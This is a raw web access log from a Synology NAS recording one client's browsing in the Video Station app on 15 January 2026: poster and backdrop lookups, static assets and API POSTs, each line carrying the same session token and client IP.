"https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14550&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1051] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29370&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29389&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14557&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/default/v2/default_tv_snapshot.png?v=1b62f98b72b9e0c753793a60ab91b555" [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_on_screen_play_s.png?v=fb8fe120392b03c6d3f10574aeaeb6f3" [Client 84.1.26.27] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_on_screen_add_s.png?v=3d0f7ae69fe973b7676ad088c68ebe9d" [Client 84.1.26.27] [Length 346] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_on_screen_more_s.png?v=ca5b63e7227b0ef0d236414b49407211" [Client 84.1.26.27] [Length 263] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/multi_select_land.png?v=9cd00cf4bfce012b53f746edbf0ee543" [Client 84.1.26.27] [Length 1096] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1841] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1063] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/default/v2/default_poster.png?v=34e3fa195f9dbc9b1dbd2a3496dac968" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/multi_select.png?v=538d287ff01465174cf2cfce98f43413" [Client 84.1.26.27] [Length 1073] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14642&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14312&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29622&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28861&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28883&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14323&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14431&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14206&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29111&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28585&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14349&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28939&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14357&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=946&mtime=2025-08-03%2017%3A45%3A08.601096&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 18663] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=944&mtime=2025-08-03%2017%3A45%3A01.289821&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 20550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:50 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=945&mtime=2025-08-03%2017%3A45%3A04.373453&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 40223] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=943&mtime=2025-08-03%2017%3A39%3A07.7503&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 18088] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=942&mtime=2025-08-03%2017%3A39%3A01.77767&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 27187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=941&mtime=2025-08-03%2017%3A38%3A55.661056&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 19265] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28955&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14270&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14646&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14645&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14643&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14641&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14644&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14640&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:51 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14639&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=13667&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28758&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27306&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=13673&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27312&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=13652&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27277&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27282&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=13655&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14141&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 